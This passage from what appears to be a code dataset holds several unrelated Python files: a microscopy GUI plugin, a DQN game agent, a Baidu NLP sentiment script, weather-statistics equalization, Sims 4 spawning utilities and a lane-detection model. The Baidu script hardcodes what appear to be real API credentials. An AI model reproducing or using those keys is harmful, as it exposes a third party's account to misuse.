self.element_id_exponent_line_edit.text = f\"{self.element_id_exponent:.2f}\"\n\n def live_analysis_changed(checked):\n self.stop_live_analysis_event.set() # always stop live analysis\n start_stop_analysis_button_next_state(state = None) \n \n # Start procedure depending on the state of the button.\n def start_stop_analysis(): \n state = self.start_stop_analysis_button.state\n if state == 0: # Start single image analysis.\n self.was_playing = None\n self.stop_live_analysis_event.clear()\n lib_structure_recognition.analyze_and_show(self, live_analysis=False)\n elif state == 2: # Start live analysis.\n self.was_playing = self.manipulator.superscan.is_playing\n self.stop_live_analysis_event.clear()\n lib_structure_recognition.analyze_and_show(self, live_analysis=True)\n elif state == 3: # Stop live analysis.\n if self.was_playing == False:\n self.manipulator.superscan.stop_playing()\n self.stop_live_analysis_event.set()\n self.manipulator.superscan.stop_playing()\n start_stop_analysis_button_next_state(state)\n\n # Change the functionality and appearance of the button.\n def start_stop_analysis_button_next_state(state = None):\n if state == None: # init\n if \"live\" in self.image_source_combo_box.current_item.lower() and self.live_analysis_check_box.checked:\n state = 2 # Start live analysis.\n else:\n state = 0 # Start single image analysis.\n elif state == 2:\n state = 3 # Stop live analysis.\n elif state == 3:\n state = 2 # Start live analysis.\n self.start_stop_analysis_button.state = state\n self.start_stop_analysis_button.text = button_state_text[state]\n\n ## GUI elements.\n # Scale calibration rows.\n scale_calibration_row, self.scale_calibration_combo_box = combo_box_template(\n self.ui, 'Mode', ['Before run time (Real space with NN)', 'At run time (Fourier space)']\n )\n scale_calibration_button_container = self.ui.create_row_widget()\n self.scale_calibration_combo_box.on_current_item_changed = scale_calibration_mode_changed\n scale_calibration_row.add(scale_calibration_button_container)\n scale_calibration_row.add_stretch()\n\n scale_calibration_display_row = self.ui.create_row_widget()\n scale_calibration_display_row.add(self.ui.create_label_widget(_('Sampling: ')))\n self.sampling_label = self.ui.create_label_widget(_('N/A'))\n scale_calibration_display_row.add(self.sampling_label)\n scale_calibration_display_row.add_stretch()\n \n # Field of view (FOV) row.\n fov_display_row = self.ui.create_row_widget()\n fov_display_row.add(self.ui.create_label_widget(_('FOV: ')))\n self.fov_label = self.ui.create_label_widget(_('N/A'))\n fov_display_row.add(self.fov_label)\n fov_display_row.add_stretch()\n \n # Image source row.\n image_source_row, self.image_source_combo_box = combo_box_template(self.ui, 'Image source',\n ['MAADF Live', 'HAADF Live', 'Selected data item']) \n self.image_source_combo_box.on_current_item_changed = image_source_changed\n\n # Visualize atoms row.\n visualize_atoms_row, self.visualize_atoms_check_box = check_box_template(self.ui, _('Plot atom positions'))\n self.visualize_atoms_check_box.on_checked_changed = visualize_atoms_changed\n \n # Foreign atom detection row.\n auto_detect_foreign_atoms_row, self.auto_detect_foreign_atoms_check_box = \\\n check_box_template(self.ui, 'Auto-detect foreign atoms')\n self.auto_detect_foreign_atoms_check_box.on_checked_changed = auto_detect_foreign_atoms_changed\n\n # Element identification rows.\n element_id_row1, self.element_id_int_radius_line_edit = \\\n line_edit_template(self.ui, \"Element ident.: Int. radius [A]: \")\n self.element_id_int_radius_line_edit.on_editing_finished = element_id_int_radius_changed\n \n element_id_row2, self.element_id_exponent_line_edit = \\\n line_edit_template(self.ui, \"Element ident.: Z-exponent: \")\n self.element_id_exponent_line_edit.on_editing_finished = element_id_exponent_changed\n \n # Control and start/stop analysis rows.\n live_analysis_row = self.ui.create_row_widget() \n button_state_text = [\n 'Start single image analysis',\n 'Processing',\n 'Start live analysis',\n 'Stop live analysis']\n start_stop_analysis_row, self.start_stop_analysis_button = push_button_template(self.ui, 'init')\n self.start_stop_analysis_button.state = None \n self.start_stop_analysis_button.on_clicked = start_stop_analysis\n \n # Number of atoms row.\n N_atoms_row = self.ui.create_row_widget()\n self.N_atoms_label = self.ui.create_label_widget('0')\n N_atoms_row.add(self.N_atoms_label)\n N_atoms_row.add(self.ui.create_label_widget(_(' atoms detected')))\n N_atoms_row.add_stretch()\n\n # Set defaults.\n self.auto_detect_foreign_atoms_check_box.checked = defaults['auto_detect_foreign_atoms']\n auto_detect_foreign_atoms_changed(self.auto_detect_foreign_atoms_check_box.checked)\n self.visualize_atoms_check_box.checked = defaults['visualize_atoms']\n visualize_atoms_changed(self.visualize_atoms_check_box.checked)\n element_id_int_radius_changed(str(defaults['element_identification_integration_radius_A']))\n element_id_exponent_changed(str(defaults['element_identification_exponent']))\n image_source_changed(defaults['image_source'])\n scale_calibration_mode_changed(defaults['scale_calibration_mode'])\n\n # Assemble GUI elements.\n section1.column.add(scale_calibration_row)\n section1.column.add(scale_calibration_display_row)\n section1.column.add(fov_display_row)\n\n section2.column.add(image_source_row)\n section2.column.add(visualize_atoms_row)\n section2.column.add(auto_detect_foreign_atoms_row)\n section2.column.add(element_id_row1)\n section2.column.add(element_id_row2)\n section2.column.add_spacing(5)\n section2.column.add(live_analysis_row)\n section2.column.add(start_stop_analysis_row)\n section2.column.add(N_atoms_row)","repo_name":"arpostl/nionswift_atom_manipulator","sub_path":"nionswift_plugin/atom_manipulator/gui_structure_recognition.py","file_name":"gui_structure_recognition.py","file_ext":"py","file_size_in_byte":13478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70029988964","text":"import parl\nfrom parl import layers\nimport paddle.fluid as fluid\nimport copy\nimport numpy as np\nimport os\nimport gym\nfrom parl.utils import logger\nfrom parl.algorithms import DQN\nfrom ple import PLE\nfrom ple.games.catcher import Catcher\nimport collections\nimport random\n\nLEARN_FREQ = 5 # 训练频率,不需要每一个step都learn,攒一些新增经验后再learn,提高效率\nMEMORY_SIZE = 20000 # replay memory的大小,越大越占用内存\nMEMORY_WARMUP_SIZE = 200 # replay_memory 里需要预存一些经验数据,再从里面sample一个batch的经验让agent去learn\nBATCH_SIZE = 32 # 每次给agent learn的数据数量,从replay memory随机里sample一批数据出来\nGAMMA = 0.99 # reward 的衰减因子,一般取 0.9 到 0.999 不等\nLEARNING_RATE = 0.001 # 学习率\n\nclass Model(parl.Model):\n def __init__(self, act_dim):\n hid1_size = 128\n hid2_size = 128\n # 3层全连接网络\n self.fc1 = layers.fc(size=hid1_size, act='relu')\n self.fc2 = layers.fc(size=hid2_size, act='relu')\n self.fc3 = layers.fc(size=act_dim, act=None)\n\n def value(self, obs):\n h1 = self.fc1(obs)\n h2 = self.fc2(h1)\n Q = self.fc3(h2)\n return Q\n\nclass Agent(parl.Agent):\n def __init__(self,\n algorithm,\n obs_dim,\n act_dim,\n e_greed=0.1,\n e_greed_decrement=0):\n assert isinstance(obs_dim, int)\n assert isinstance(act_dim, int)\n self.obs_dim = obs_dim\n self.act_dim = act_dim\n super(Agent, self).__init__(algorithm)\n\n self.global_step = 0\n self.update_target_steps = 200 # 每隔200个training steps再把model的参数复制到target_model中\n\n self.e_greed = e_greed # 有一定概率随机选取动作,探索\n self.e_greed_decrement = e_greed_decrement # 随着训练逐步收敛,探索的程度慢慢降低\n\n def build_program(self):\n self.pred_program = fluid.Program()\n self.learn_program = fluid.Program()\n\n with fluid.program_guard(self.pred_program): # 搭建计算图用于 预测动作,定义输入输出变量\n obs = layers.data(\n name='obs', shape=[self.obs_dim], dtype='float32')\n self.value = self.alg.predict(obs)\n\n with fluid.program_guard(self.learn_program): # 搭建计算图用于 更新Q网络,定义输入输出变量\n obs = layers.data(\n name='obs', shape=[self.obs_dim], dtype='float32')\n action = layers.data(name='act', shape=[1], dtype='int32')\n reward = layers.data(name='reward', shape=[], dtype='float32')\n next_obs = layers.data(\n name='next_obs', shape=[self.obs_dim], dtype='float32')\n terminal = layers.data(name='terminal', shape=[], dtype='bool')\n self.cost = self.alg.learn(obs, action, reward, next_obs, terminal)\n\n def sample(self, obs):\n sample = np.random.rand() # 产生0~1之间的小数\n if sample < self.e_greed:\n act = np.random.randint(self.act_dim) # 探索:每个动作都有概率被选择\n else:\n act = self.predict(obs) # 选择最优动作\n self.e_greed = max(\n 0.01, self.e_greed - self.e_greed_decrement) # 随着训练逐步收敛,探索的程度慢慢降低\n return act\n\n def predict(self, obs): # 选择最优动作\n obs = np.expand_dims(obs, axis=0)\n pred_Q = self.fluid_executor.run(\n self.pred_program,\n feed={'obs': obs.astype('float32')},\n fetch_list=[self.value])[0]\n pred_Q = np.squeeze(pred_Q, axis=0)\n act = np.argmax(pred_Q) # 选择Q最大的下标,即对应的动作\n return act\n\n def learn(self, obs, act, reward, next_obs, terminal):\n # 每隔200个training steps同步一次model和target_model的参数\n if self.global_step % self.update_target_steps == 0:\n self.alg.sync_target()\n self.global_step += 1\n\n act = np.expand_dims(act, -1)\n feed = {\n 'obs': obs.astype('float32'),\n 'act': act.astype('int32'),\n 'reward': reward,\n 'next_obs': next_obs.astype('float32'),\n 'terminal': terminal\n }\n cost = self.fluid_executor.run(\n self.learn_program, feed=feed, fetch_list=[self.cost])[0] # 训练一次网络\n return cost\n\nclass ReplayMemory(object):\n def __init__(self, max_size):\n self.buffer = collections.deque(maxlen=max_size)\n\n def append(self, exp):\n self.buffer.append(exp)\n\n def sample(self, batch_size):\n mini_batch = random.sample(self.buffer, batch_size)\n obs_batch, action_batch, reward_batch, next_obs_batch, done_batch = [], [], [], [], []\n\n for experience in mini_batch:\n s, a, r, s_p, done = experience\n obs_batch.append(s)\n action_batch.append(a)\n reward_batch.append(r)\n next_obs_batch.append(s_p)\n done_batch.append(done)\n\n return np.array(obs_batch).astype('float32'), \\\n np.array(action_batch).astype('float32'), np.array(reward_batch).astype('float32'),\\\n np.array(next_obs_batch).astype('float32'), np.array(done_batch).astype('float32')\n\n def __len__(self):\n return len(self.buffer)\n\n\n# 训练一个episode\ndef run_episode(env, agent, rpm):\n total_reward = 0\n env.reset_game()\n obs = list(env.getGameState().values())\n step = 0\n while True:\n step += 1\n action_index = agent.sample(obs) # 采样动作,所有动作都有概率被尝试到\n action = env.getActionSet()[action_index]\n # 行动\n reward = env.act(action)\n next_obs = list(env.getGameState().values())\n done = env.game_over()\n rpm.append((obs, action_index, reward, next_obs, done))\n\n # train model\n if (len(rpm) > MEMORY_WARMUP_SIZE) and (step % LEARN_FREQ == 0):\n (batch_obs, batch_action, batch_reward, batch_next_obs,\n batch_done) = rpm.sample(BATCH_SIZE)\n train_loss = agent.learn(batch_obs, batch_action, batch_reward,\n batch_next_obs,\n batch_done) # s,a,r,s',done\n\n total_reward += reward\n obs = next_obs\n if done:\n break\n return total_reward\n\n\n# 评估 agent, 跑 5 个episode,总reward求平均\ndef evaluate(env, agent, render=False):\n eval_reward = []\n for i in range(5):\n env.reset_game()\n obs = list(env.getGameState().values())\n episode_reward = 0\n while True:\n action = agent.predict(obs) # 预测动作,只选最优动作\n action = env.getActionSet()[action]\n reward = env.act(action)\n obs = list(env.getGameState().values())\n episode_reward += reward\n if render:\n env.getScreenRGB()\n if env.game_over():\n break\n eval_reward.append(episode_reward)\n return np.mean(eval_reward)\n\nenv = Catcher(500, 500)\nenv = PLE(env, fps=10, display_screen=True, force_fps=False)\nact_dim = len(env.getActionSet())\nobs_dim = len(env.getGameState())\n\nrpm = ReplayMemory(MEMORY_SIZE)\nmodel = Model(act_dim=act_dim)\nalg = DQN(model, act_dim=act_dim, gamma=GAMMA, lr=LEARNING_RATE)\n\nagent = Agent(alg, obs_dim=obs_dim, act_dim=act_dim,e_greed_decrement=0.1,e_greed=1e-6)\n\"\"\"\n#添加经验池\nwhile len(rpm) < MEMORY_WARMUP_SIZE:\n run_episode(env, agent, rpm)\n\n\nmax_episode = 2000\n# start train\nepisode = 0\nwhile episode < max_episode: # 训练max_episode个回合,test部分不计算入episode数量\n # train part\n for i in range(0, 50):\n print(i)\n total_reward = run_episode(env, agent, rpm)\n episode += 1\n\n # test part\n eval_reward = evaluate(env, agent, render=True) # render=True 查看显示效果\n logger.info('episode:{} e_greed:{} Test reward:{}'.format(\n episode, agent.e_greed, eval_reward))\n\n save_path = './Catcher_'+ str(episode) +'.ckpt'\n agent.save(save_path)\n\"\"\"\n#进行预测\nckpt = 'catcher_models/Catcher_1750.ckpt' # 请设置ckpt为你训练中效果最好的一次评估保存的模型文件名称\n\nagent.restore(ckpt)\nevaluate_reward = evaluate(env, agent)\nlogger.info('Evaluate reward: {}'.format(evaluate_reward)) # 打印评估的reward\n\n","repo_name":"thunder95/PARL","sub_path":"assign_2/catcher.py","file_name":"catcher.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"12744024325","text":"import argparse\nimport common\nfrom assets import asset_utils\n\n\ndef create_asset(target_dir):\n \"\"\"Create the asset.\"\"\"\n # The common case is to add one or more images to the existing set. Therefore,\n # download the previous version first.\n asset = asset_utils.Asset(common.ASSET_NAME, asset_utils.MultiStore())\n asset.download_current_version(target_dir)\n\n # Allow the user to modify the contents of the target dir.\n raw_input('Previous SKImage contents have been downloaded. Please make '\n 'your desired changes in the following directory and press enter '\n 'to continue:\\n%s' % target_dir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target_dir', '-t', required=True)\n args = parser.parse_args()\n create_asset(args.target_dir)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/infra/bots/assets/skimage/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"12740702180","text":"from aip import AipNlp\r\n\r\nAPP_ID = '10637556'\r\nAPI_KEY = 'rm0HA7EqfQ16HdOZMqwHkho5'\r\nSECRET_KEY = '3rM91Nj9Z3aLarTgMqvbexdwl0fN3vNd'\r\nclient = AipNlp(APP_ID, API_KEY, SECRET_KEY)\r\ntext=\"我们这byd电动🚕报价20+,zf补10+\"\r\ntext = ''.join(e for e in text if e.isalnum())\r\nresp = client.sentimentClassify(text)\r\nsentiment = resp['items'][0]['sentiment']\r\nprint(resp)\r\n# pprint(resp)\r\nprint(\"分析的文本为:\",text)\r\nprint(\"情感分析结果为:\",end='')\r\nif sentiment == 0:\r\n print(sentiment,\"负向\")\r\nelif sentiment ==1:\r\n print(sentiment,\"中性\")\r\nelse:\r\n print(sentiment,\"正向\")\r\n\r\n\r\n\r\n\r\n# if len(one) > 1:\r\n# \t\t\t\t\t\tfee = feel_analyse(one[1])\r\n# \t\t\t\t\t\tif fee == 0:\r\n# \t\t\t\t\t\t\tone.append(\"负向\")\r\n# \t\t\t\t\t\telif fee == 1:\r\n# \t\t\t\t\t\t\tone.append(\"中性\")\r\n# \t\t\t\t\t\telse:\r\n# \t\t\t\t\t\t\tone.append(\"正向\")\r\n# \t\t\t\t\telse:\r\n# \t\t\t\t\t\tcontinue","repo_name":"MrLiuBee/IREngine","sub_path":"aipNlp.py","file_name":"aipNlp.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"31019203669","text":" # ============================*\n # ** Copyright UCAR (c) 2020\n # ** University Corporation for Atmospheric Research (UCAR)\n # ** National Center for Atmospheric Research (NCAR)\n # ** Research Applications Lab (RAL)\n # ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA\n # ============================*\n \n \n \n\"\"\"\nProgram Name: agg_stat_eqz.py\n\nHow to use:\n - Call from other Python function\n AGG_STAT_EVENT_EQZ = AggStatEventEqz(PARAMS)\n AGG_STAT_EVENT_EQZ.calculate_values()\n where PARAMS – a dictionary with data description parameters including\n location of input and output data.\n The structure is similar to Rscript template\n\n - Run as a stand-alone script\n python agg_stat_eqz.py \n where - is YAML file with parameters\n and environment variable should be set to PYTHONPATH=\n\n - Run from Java\n proc = Runtime.getRuntime().exec(\n “python agg_stat.eqz.py ”,\n new String[]{”PYTHONPATH=”},\n new File(System.getProperty(\"user.home\")));\n\n\"\"\"\nimport argparse\nimport sys\nimport logging\nimport pandas as pd\nimport yaml\nimport warnings\n\nfrom metcalcpy import GROUP_SEPARATOR\nfrom metcalcpy.event_equalize_against_values import event_equalize_against_values\nfrom metcalcpy.util.utils import parse_bool\n\n\nclass AggStatEventEqz:\n \"\"\"A class that performs event equalisation logic on input data\n with MODE and MTD attribute statistics\n EE is executed against previously calculated cases\n\n All parameters including data description and location is in the parameters dictionary\n Usage:\n initialise this call with the parameters dictionary and then\n calls perform_ee method\n This method will execute EE and save the result to the file\n AGG_STAT_EVENT_EQZ = AggStatEventEqz(PARAMS)\n AGG_STAT_EVENT_EQZ.calculate_values()\n \"\"\"\n\n def __init__(self, in_params):\n self.params = in_params\n\n self.input_data = pd.read_csv(\n self.params['agg_stat_input'],\n header=[0],\n sep='\\t'\n )\n\n self.column_names = self.input_data.columns.values\n self.series_data = None\n\n def calculate_values(self):\n \"\"\"Performs event equalisation if needed and saves equalized data to the file.\n \"\"\"\n is_event_equal = parse_bool(self.params['event_equal'])\n\n # check if EE is needed\n if not self.input_data.empty and is_event_equal:\n # read previously calculated cases\n prev_cases = pd.read_csv(\n self.params['agg_stat_input_ee'],\n header=[0],\n sep='\\t'\n )\n\n # perform for axis 1\n output_ee_data = self.perform_ee_on_axis(prev_cases, '1')\n\n # perform for axis 2\n if self.params['series_val_2']:\n output_ee_data = pd.concat([output_ee_data, self.perform_ee_on_axis(prev_cases, '2')])\n else:\n output_ee_data = self.input_data\n if self.input_data.empty:\n logging.info(\n 'Event equalisation was not performed because the input data is empty.'\n )\n\n output_ee_data.to_csv(self.params['agg_stat_output'],\n index=None, header=True, mode='w',\n sep=\"\\t\", na_rep=\"NA\")\n\n def perform_ee_on_axis(self, prev_cases, axis='1'):\n \"\"\"Performs event equalisation against previously calculated cases for the selected axis\n Returns:\n A data frame that contains equalized records\n \"\"\"\n warnings.filterwarnings('error')\n\n output_ee_data = pd.DataFrame()\n for fcst_var, fcst_var_stats in self.params['fcst_var_val_' + axis].items():\n for series_var, series_var_vals in self.params['series_val_' + axis].items():\n\n series_var_vals_no_group = []\n for val in series_var_vals:\n split_val = val.split(GROUP_SEPARATOR)\n series_var_vals_no_group.extend(split_val)\n\n # filter input data based on fcst_var, statistic and all series variables values\n series_data_for_ee = self.input_data[\n (self.input_data['fcst_var'] == fcst_var)\n & (self.input_data[series_var].isin(series_var_vals_no_group))\n ]\n # filter previous cases on the same fcst_var,\n # statistic and all series variables values\n series_data_for_prev_cases = prev_cases[\n (prev_cases['fcst_var'] == fcst_var)\n & (prev_cases[series_var].isin(series_var_vals_no_group))\n ]\n # get unique cases from filtered previous cases\n\n series_data_for_prev_cases_unique = series_data_for_prev_cases['equalize'].unique()\n\n # perform ee\n series_data_after_ee = event_equalize_against_values(\n series_data_for_ee,\n series_data_for_prev_cases_unique)\n\n # append EE data to result\n if output_ee_data.empty:\n output_ee_data = series_data_after_ee\n else:\n output_ee_data = pd.concat([output_ee_data, series_data_after_ee])\n return output_ee_data\n\n\nif __name__ == \"__main__\":\n PARSER = argparse.ArgumentParser(description='List of agg_stat_event_eqz arguments')\n PARSER.add_argument(\"parameters_file\", help=\"Path to YAML parameters file\",\n type=argparse.FileType('r'),\n default=sys.stdin)\n ARGS = PARSER.parse_args()\n PARAMS = yaml.load(ARGS.parameters_file, Loader=yaml.FullLoader)\n\n AGG_STAT_EVENT_EQZ = AggStatEventEqz(PARAMS)\n AGG_STAT_EVENT_EQZ.calculate_values()\n","repo_name":"dtcenter/METcalcpy","sub_path":"metcalcpy/agg_stat_eqz.py","file_name":"agg_stat_eqz.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"17297615884","text":"from typing import Union, Tuple\n\nfrom protocolbuffers.Math_pb2 import Vector3\nfrom sims.household import Household\nfrom sims.sim_info import SimInfo\nfrom sims.sim_info_types import Gender, Age, Species\nfrom sims.sim_spawner import SimCreator, SimSpawner\nfrom sims4communitylib.exceptions.common_exceptions_handler import CommonExceptionHandler\nfrom sims4communitylib.modinfo import ModInfo\n\n\nclass CommonSimSpawnUtils:\n \"\"\"Utilities for creating, spawning, and despawning Sims.\n\n \"\"\"\n\n @staticmethod\n @CommonExceptionHandler.catch_exceptions(ModInfo.get_identity(), fallback_return=None)\n def create_human_sim_info(\n gender: Gender=None,\n age: Age=None,\n first_name: str=None,\n last_name: str=None,\n trait_ids: Tuple[int]=(),\n household: Household=None,\n source: str='testing'\n ) -> Union[SimInfo, None]:\n \"\"\"create_human_sim_info(\\\n gender=None,\\\n age=None,\\\n species=None,\\\n first_name=None,\\\n last_name=None,\\\n trait_ids=(),\\\n household=None,\\\n source='testing'\\\n )\n\n Create SimInfo for a Human Sim.\n\n :param gender: The Gender of the created Sim.\n :type gender: Gender, optional\n :param age: The Age of the created Sim.\n :type age: Age, optional\n :param first_name: The First Name of the created Sim.\n :type first_name: str, optional\n :param last_name: The Last Name of the created Sim.\n :type last_name: str, optional\n :param trait_ids: The decimal identifiers of the Traits to add to the created Sim.\n :type trait_ids: Tuple[int], optional\n :param household: The household to place the created Sim in. If None, the Sim will be placed in a hidden household.\n :type household: Household, optional\n :param source: The reason for the Sims creation.\n :type source: str, optional\n :return: The SimInfo of the created Sim or None if the Sim failed to be created.\n :rtype: SimInfo\n \"\"\"\n from sims4communitylib.utils.sims.common_household_utils import CommonHouseholdUtils\n household = household or CommonHouseholdUtils.create_empty_household(as_hidden_household=True)\n sim_creator = SimCreator(gender=gender, age=age, first_name=first_name or SimSpawner.get_random_first_name(gender, Species.HUMAN), last_name=last_name, traits=trait_ids)\n (sim_info_list, _) = SimSpawner.create_sim_infos((sim_creator,), household=household, generate_deterministic_sim=True, creation_source=source)\n if not sim_info_list:\n return None\n return sim_info_list[0]\n\n @staticmethod\n def spawn_sim(sim_info: SimInfo, location: Vector3) -> bool:\n \"\"\"spawn_sim(sim_info, location)\n\n Spawn a Sim.\n\n :param sim_info: The Sim to Spawn.\n :type sim_info: SimInfo\n :param location: The location to spawn the Sim at.\n :type location: Vector3\n :return: True, if the Sim was spawned successfully. False, if not.\n :rtype: bool\n \"\"\"\n try:\n SimSpawner.spawn_sim(sim_info, sim_location=location)\n except Exception as ex:\n CommonExceptionHandler.log_exception(ModInfo.get_identity(), 'Failed to spawn Sim with SimInfo \\'{}\\' at location \\'{}\\'.'.format(sim_info, location), exception=ex)\n return False\n return True\n\n @staticmethod\n def spawn_sim_at_active_sim_location(sim_info: SimInfo) -> bool:\n \"\"\"spawn_sim_at_active_sim_location(sim_info)\n\n Spawn a Sim at the position of the Active Sim.\n\n :param sim_info: The Sim to Spawn.\n :type sim_info: SimInfo\n :return: True, if the Sim was spawned successfully. False, if not.\n :rtype: bool\n \"\"\"\n from sims4communitylib.utils.sims.common_sim_location_utils import CommonSimLocationUtils\n from sims4communitylib.utils.sims.common_sim_utils import CommonSimUtils\n active_sim_info = CommonSimUtils.get_active_sim_info()\n return CommonSimSpawnUtils.spawn_sim(sim_info, location=CommonSimLocationUtils.get_location(active_sim_info))\n\n @staticmethod\n def despawn_sim(sim_info: SimInfo, cause: str=None) -> bool:\n \"\"\"despawn_sim(sim_info, cause=None)\n\n Despawn a Sim.\n\n :param sim_info: The Sim to despawn.\n :type sim_info: SimInfo\n :param cause: The reason for the despawn.\n :type cause: str, optional\n :return: True, if the Sim was despawn successfully. False, if not.\n :rtype: bool\n \"\"\"\n if sim_info is None:\n return False\n from sims4communitylib.utils.sims.common_sim_utils import CommonSimUtils\n sim = CommonSimUtils.get_sim_instance(sim_info)\n if sim is None:\n return True\n cause = cause or 'Sim destroyed.'\n sim.destroy(cause=cause)\n return True\n\n @staticmethod\n def delete_sim(sim_info: SimInfo, cause: str=None) -> bool:\n \"\"\"delete_sim(sim_info, cause=None)\n\n Delete a Sim.\n\n :param sim_info: The Sim to delete.\n :type sim_info: SimInfo\n :param cause: The reason for the deletion.\n :type cause: str, optional\n :return: True, if the Sim was deleted successfully. False, if not.\n :rtype: bool\n \"\"\"\n if not CommonSimSpawnUtils.despawn_sim(sim_info, cause=cause):\n return False\n sim_info.remove_permanently()\n return True\n","repo_name":"xoxonaad/Sims4CommunityLibrary","sub_path":"Scripts/sims4communitylib/utils/sims/common_sim_spawn_utils.py","file_name":"common_sim_spawn_utils.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"19796190109","text":"import tkinter\nfrom tkinter import *\nimport cv2\nimport PIL.Image, PIL.ImageTk\nimport time\nimport argparse\nimport os\nfrom keras import backend as K\nimport tensorflow as tf\nfrom scipy.spatial import distance as dist\nfrom imutils.video import VideoStream\nfrom imutils import face_utils\nfrom threading import Thread\nimport numpy as np\nimport playsound\nimport argparse\nimport imutils\nimport time\nimport dlib\nimport cv2\nimport pyttsx3\nfrom collections import deque\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\n\n \nclass LaneDetectionService:\n\n\tdef __init__(self, args):\n\n\t\t# build models\n\n\t\tprint(\"[INFO] loading segmentation model...\")\n\t\tself.unet = load_model(\"models/road_line_segmentation_unet.hdf5\")\n\t\t\n\t\t# variables\n\n\t\tself.left_fit_list = []\n\t\tself.right_fit_list = []\n\t\tself.center_fit_list = []\n\n\t\tself.left_fitx_list = []\n\t\tself.right_fitx_list = []\n\t\tself.center_fitx_list = []\n\n\t\tself.XM_PER_PIX = 3.7 / 720\n\t\tself.SRC = np.float32([[690, 440], [790, 440], [560, 680], [1260, 680]])\n\t\tself.DST = np.float32([[[200, 0], [1200, 0], [200, 710], [1200, 710]]], dtype=np.int32)\n\n\n\tdef segment(self, frame):\n\n\t\tseg = self.unet.predict(np.expand_dims(preprocess_input(frame), axis=0))[0]\n\t\tseg = (seg * 255).astype('uint8')\n\n\t\treturn seg\n\n\n\tdef perspectiveWarp(self, img):\n\n\t\timg_size = (img.shape[1], img.shape[0])\n\t\tmatrix = cv2.getPerspectiveTransform(self.SRC, self.DST)\n\t\tminv = cv2.getPerspectiveTransform(self.DST, self.SRC)\n\t\tbirdseye = cv2.warpPerspective(img, matrix, img_size)\n\t\theight, width = birdseye.shape[:2]\n\n\t\tbirdseyeLeft = birdseye[0:height, 0:width // 2]\n\t\tbirdseyeRight = birdseye[0:height, width // 2:width]\n\n\t\treturn birdseye, birdseyeLeft, birdseyeRight, minv\n\n\n\tdef plotHistogram(self, img):\n\n\t\thistogram = np.sum(img[img.shape[0] // 2:, :], axis = 0)\n\n\t\tmidpoint = np.int(histogram.shape[0] / 2)\n\t\tleftxBase = np.argmax(histogram[:midpoint])\n\t\trightxBase = np.argmax(histogram[midpoint:]) + midpoint\n\n\t\treturn histogram, leftxBase, rightxBase\n\n\n\tdef slide_window_search(self, binary_warped, histogram):\n\n\t\tout_img = np.dstack((binary_warped, binary_warped, binary_warped))\n\t\tmidpoint = np.int(histogram.shape[0] / 2)\n\t\tleftx_base = np.argmax(histogram[:midpoint])\n\t\trightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n\t\tnwindows = 10\n\t\twindow_height = np.int(binary_warped.shape[0] / nwindows)\n\t\tnonzero = binary_warped.nonzero()\n\t\tnonzeroy = np.array(nonzero[0])\n\t\tnonzerox = np.array(nonzero[1])\n\t\tleftx_current = leftx_base\n\t\trightx_current = rightx_base\n\t\tmargin = 100\n\t\tminpix = 50\n\t\tleft_lane_inds = []\n\t\tright_lane_inds = []\n\n\t\tfor window in range(nwindows):\n\t\t\twin_y_low = binary_warped.shape[0] - (window + 1) * window_height\n\t\t\twin_y_high = binary_warped.shape[0] - window * window_height\n\t\t\twin_xleft_low = leftx_current - margin\n\t\t\twin_xleft_high = leftx_current + margin\n\t\t\twin_xright_low = rightx_current - margin\n\t\t\twin_xright_high = rightx_current + margin\n\t\t\tgood_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n\t\t\t(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n\t\t\tgood_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n\t\t\t(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n\t\t\tcolor_left = (255,255,255) if len(good_left_inds) > 100 else (255,0,0)\n\t\t\tcolor_right = (255,255,255) if len(good_right_inds) > 100 else (255,0,0)\n\t\t\tleft_lane_inds.append(good_left_inds)\n\t\t\tright_lane_inds.append(good_right_inds)\n\n\t\t\tif len(good_left_inds) > minpix:\n\t\t\t\tleftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n\t\t\tif len(good_right_inds) > minpix:\n\t\t\t\trightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n\t\tleft_lane_inds = np.concatenate(left_lane_inds)\n\t\tright_lane_inds = np.concatenate(right_lane_inds)\n\n\t\tleftx = nonzerox[left_lane_inds]\n\t\tlefty = nonzeroy[left_lane_inds]\n\t\trightx = nonzerox[right_lane_inds]\n\t\trighty = nonzeroy[right_lane_inds]\n\n\t\tleft_fit = np.polyfit(lefty, leftx, 2)\n\t\tright_fit = np.polyfit(righty, rightx, 2)\n\t\tcenter_fit = (left_fit + right_fit) / 2\n\n\t\tploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])\n\t\tleft_fitx = left_fit[0] * ploty**2 + left_fit[1] * ploty + left_fit[2]\n\t\tright_fitx = right_fit[0] * ploty**2 + right_fit[1] * ploty + right_fit[2]\n\t\tcenter_fitx = center_fit[0] * ploty**2 + center_fit[1] * ploty + center_fit[2]\n\n\t\tltx = np.trunc(left_fitx)\n\t\trtx = np.trunc(right_fitx)\n\t\tctx = np.trunc(center_fitx)\n\n\t\treturn ploty, left_fit, right_fit, center_fit, ltx, rtx, ctx\n\n\n\tdef general_search(self, binary_warped, left_fit, right_fit):\n\n\t\tnonzero = 